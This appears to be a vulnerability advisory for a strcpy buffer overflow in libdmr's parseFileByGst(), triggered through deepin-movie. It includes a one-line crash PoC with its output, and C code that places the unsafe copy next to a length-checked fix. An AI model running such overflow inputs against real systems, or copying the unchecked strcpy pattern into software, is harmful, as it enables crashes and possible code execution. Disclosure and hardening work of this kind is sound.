Summary
The parseFileByGst() function in libdmr copies the URL provided as an argument to a fixed-size buffer using strcpy. If a URL longer than the fixed buffer size is provided, the buffer will overflow.
PoC
$ deepin-movie $(python3 -c 'print("A"*1024)')
log path: "/home/u32i/.cache/deepin/deepin-movie/deepin-movie.log"
No appenders assotiated with category qt.qpa.xcb
[Warning] <> QXcbConnection: XCB error: 5 (BadAtom), sequence: 402, resource id: 0, major code: 20 (GetProperty), minor code: 0
*** buffer overflow detected ***: terminated
Aborted
Impact
Successful exploitation of this vulnerability will result in an application-level DoS or could result in remote code execution.
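The copy pattern described in the Summary, next to a length-checked replacement, as an added example that is not libdmr's code or its actual fix. The buffer size, function names and return codes are assumptions, since the advisory does not state them; the long input is constructed to mirror the 1024-character PoC argument.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size: the advisory does not state the real buffer length. */
#define URL_BUF_SIZE 256

enum { URL_OK = 0, URL_ERR_ARG = -1, URL_ERR_TOO_LONG = -2 }; /* hypothetical codes */

/* Pattern from the advisory: unbounded copy into a fixed-size buffer.
 * Kept for comparison only; it is never called here. */
void copy_url_unsafe(char *dst, const char *url)
{
    strcpy(dst, url); /* writes past dst once strlen(url) >= URL_BUF_SIZE */
}

/* Hardened form: reject overlong input instead of truncating it, because a
 * silently truncated URL could name a different resource. */
int copy_url_checked(char *dst, size_t dst_size, const char *url)
{
    if (dst == NULL || dst_size == 0 || url == NULL)
        return URL_ERR_ARG;

    /* Look for the terminator within the first dst_size bytes only. */
    const char *end = memchr(url, '\0', dst_size);
    if (end == NULL) {
        dst[0] = '\0'; /* leave a defined, empty result */
        return URL_ERR_TOO_LONG;
    }
    memcpy(dst, url, (size_t)(end - url) + 1); /* includes the NUL */
    return URL_OK;
}

int main(void)
{
    char buf[URL_BUF_SIZE];
    char long_url[1025];

    /* Constructed input: 1024 'A' characters, as in the PoC argument. */
    memset(long_url, 'A', sizeof long_url - 1);
    long_url[sizeof long_url - 1] = '\0';

    printf("short: %d\n", copy_url_checked(buf, sizeof buf, "file:///tmp/a.mp4"));
    printf("long:  %d\n", copy_url_checked(buf, sizeof buf, long_url));
    return 0;
}
```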